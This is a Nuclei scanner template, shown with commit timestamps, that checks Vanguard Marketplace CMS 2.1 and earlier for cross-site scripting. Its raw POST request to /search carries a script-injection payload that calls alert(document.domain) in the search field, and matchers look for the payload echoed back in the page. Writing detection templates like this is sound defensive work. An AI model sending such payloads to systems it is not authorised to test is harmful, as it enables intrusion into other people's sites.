nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml

36 lines
909 B
YAML
Raw Normal View History

2021-11-04 15:12:47 +00:00
id: vanguard-post-xss
info:
2021-11-05 00:31:59 +00:00
name: Vanguard Marketplace CMS ≤ 2.1
2021-11-04 15:12:47 +00:00
author: ImNightmaree
severity: medium
2021-11-05 16:06:53 +00:00
description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
reference:
- https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
2021-11-05 00:31:59 +00:00
tags: vanguard,xss
2021-11-04 15:12:47 +00:00
requests:
- raw:
- |
POST /search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-11-05 00:31:59 +00:00
2021-11-05 16:06:53 +00:00
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2021-11-05 00:31:59 +00:00
2021-11-04 15:12:47 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-11-05 16:06:53 +00:00
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200